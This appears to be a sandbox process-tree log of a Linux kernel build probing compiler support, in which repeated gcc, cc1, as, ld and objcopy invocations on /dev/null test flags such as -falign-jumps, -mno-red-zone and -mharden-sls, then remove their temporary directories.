/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1708/ -dumpbase tmp "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccBOSuZ3.s5⤵PID:1711
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1708/tmp /tmp/ccBOSuZ3.s5⤵PID:1712
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1708/tmp /tmp/ccBOSuZ3.s5⤵PID:1712
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1708/tmp /tmp/ccBOSuZ3.s5⤵PID:1712
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1708/tmp /tmp/ccBOSuZ3.s5⤵PID:1712
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17084⤵PID:1713
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-fcf-protection=none\"; else echo \"\"; fi"3⤵PID:1714
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17144⤵PID:1715
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -c -x c /dev/null -o /tmp/a/.tmp_1714/tmp4⤵PID:1716
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1714/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccouq4a4.s5⤵
- Writes file to tmp directory
PID:1717
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1714/tmp /tmp/ccouq4a4.s5⤵PID:1718
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1714/tmp /tmp/ccouq4a4.s5⤵PID:1718
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1714/tmp /tmp/ccouq4a4.s5⤵PID:1718
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1714/tmp /tmp/ccouq4a4.s5⤵
- Writes file to tmp directory
PID:1718
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17144⤵PID:1719
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-jumps=1\"; else echo \"\"; fi"3⤵PID:1720
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17204⤵PID:1721
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" -c -x c /dev/null -o /tmp/a/.tmp_1720/tmp4⤵PID:1722
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1720/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccZj0wKQ.s5⤵
- Writes file to tmp directory
PID:1723
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccZj0wKQ.s5⤵PID:1724
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccZj0wKQ.s5⤵PID:1724
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccZj0wKQ.s5⤵PID:1724
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1720/tmp /tmp/ccZj0wKQ.s5⤵PID:1724
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17204⤵PID:1725
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-falign-loops=1\"; else echo \"\"; fi"3⤵PID:1726
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17264⤵
- Reads runtime system information
PID:1727
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -c -x c /dev/null -o /tmp/a/.tmp_1726/tmp4⤵
- Writes file to tmp directory
PID:1728 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1726/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/ccOeuSbG.s5⤵PID:1729
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1726/tmp /tmp/ccOeuSbG.s5⤵PID:1730
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1726/tmp /tmp/ccOeuSbG.s5⤵PID:1730
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1726/tmp /tmp/ccOeuSbG.s5⤵PID:1730
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1726/tmp /tmp/ccOeuSbG.s5⤵
- Writes file to tmp directory
PID:1730
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17264⤵PID:1731
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mno-fp-ret-in-387\"; else echo \"\"; fi"3⤵PID:1732
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17324⤵PID:1733
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 -c -x c /dev/null -o /tmp/a/.tmp_1732/tmp4⤵
- Writes file to tmp directory
PID:1734 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1732/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cckvFWki.s5⤵PID:1735
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1732/tmp /tmp/cckvFWki.s5⤵PID:1736
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1732/tmp /tmp/cckvFWki.s5⤵PID:1736
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1732/tmp /tmp/cckvFWki.s5⤵PID:1736
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1732/tmp /tmp/cckvFWki.s5⤵
- Writes file to tmp directory
PID:1736
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17324⤵PID:1737
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-mskip-rax-setup\"; else echo \"\"; fi"3⤵PID:1738
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17384⤵
- Reads runtime system information
PID:1739
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup -c -x c /dev/null -o /tmp/a/.tmp_1738/tmp4⤵
- Writes file to tmp directory
PID:1740 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ /dev/null -quiet -dumpdir /tmp/a/.tmp_1738/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -o /tmp/cckibGVV.s5⤵
- Writes file to tmp directory
PID:1741
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1738/tmp /tmp/cckibGVV.s5⤵PID:1742
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1738/tmp /tmp/cckibGVV.s5⤵PID:1742
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1738/tmp /tmp/cckibGVV.s5⤵PID:1742
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1738/tmp /tmp/cckibGVV.s5⤵
- Writes file to tmp directory
PID:1742
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17384⤵PID:1743
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( /bin/echo -e '1: .quad 1b' | gcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o \"\$TMP\" - && objcopy -O elf32-x86-64 \"\$TMP\" \"\$TMP.o\" && ld -m elf32_x86_64 \"\$TMP.o\" -o \"\$TMP\") >/dev/null 2>&1; then echo \"y\"; else echo \"n\"; fi"3⤵PID:1744
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17444⤵PID:1745
-
-
/usr/bin/gccgcc -D__ASSEMBLY__ -fno-PIE -m64 -c -x assembler -o /tmp/a/.tmp_1744/tmp -4⤵PID:1748
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1744/tmp -5⤵PID:1749
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1744/tmp -5⤵PID:1749
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1744/tmp -5⤵PID:1749
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1744/tmp -5⤵
- Writes file to tmp directory
PID:1749
-
-
-
/bin/echo/bin/echo -e "1: .quad 1b"4⤵PID:1747
-
-
/usr/bin/objcopyobjcopy -O elf32-x86-64 /tmp/a/.tmp_1744/tmp /tmp/a/.tmp_1744/tmp.o4⤵PID:1750
-
-
/usr/bin/ldld -m elf32_x86_64 /tmp/a/.tmp_1744/tmp.o -o /tmp/a/.tmp_1744/tmp4⤵
- Writes file to tmp directory
PID:1746
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17444⤵PID:1751
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-frame-address\"; else echo \"\"; fi"3⤵PID:1752
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17524⤵PID:1753
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wframe-address -c -x c /dev/null -o /tmp/a/.tmp_1752/tmp4⤵PID:1754
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1752/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wframe-address "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/cc5OI5tx.s5⤵PID:1755
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/cc5OI5tx.s5⤵PID:1756
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/cc5OI5tx.s5⤵PID:1756
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/cc5OI5tx.s5⤵PID:1756
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1752/tmp /tmp/cc5OI5tx.s5⤵
- Writes file to tmp directory
PID:1756
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17524⤵PID:1757
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-truncation\"; else echo \"\"; fi"3⤵PID:1758
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17584⤵PID:1759
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wformat-truncation -c -x c /dev/null -o /tmp/a/.tmp_1758/tmp4⤵PID:1760
-
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1758/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/cc0J18e8.s5⤵
- Writes file to tmp directory
PID:1761
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/cc0J18e8.s5⤵PID:1762
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/cc0J18e8.s5⤵PID:1762
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/cc0J18e8.s5⤵PID:1762
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1758/tmp /tmp/cc0J18e8.s5⤵PID:1762
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17584⤵PID:1763
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -mindirect-branch-cs-prefix -mfunction-return=thunk-extern -fno-jump-tables -mharden-sls=all -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-format-overflow\"; else echo \"\"; fi"3⤵PID:1764
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17644⤵PID:1765
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" -fno-jump-tables "-mharden-sls=all" -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wformat-overflow -c -x c /dev/null -o /tmp/a/.tmp_1764/tmp4⤵
- Writes file to tmp directory
PID:1766 -
/usr/lib/gcc/x86_64-linux-gnu/11/cc1/usr/lib/gcc/x86_64-linux-gnu/11/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI /dev/null -quiet -dumpdir /tmp/a/.tmp_1764/ -dumpbase tmp -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register -mindirect-branch-cs-prefix "-mfunction-return=thunk-extern" "-mharden-sls=all" "-march=x86-64" -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=1" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fstack-clash-protection -o /tmp/ccJi1DDs.s5⤵
- Writes file to tmp directory
PID:1767
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/ccJi1DDs.s5⤵PID:1768
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/ccJi1DDs.s5⤵PID:1768
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/ccJi1DDs.s5⤵PID:1768
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1764/tmp /tmp/ccJi1DDs.s5⤵
- Writes file to tmp directory
PID:1768
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17644⤵PID:1769
-
-
-
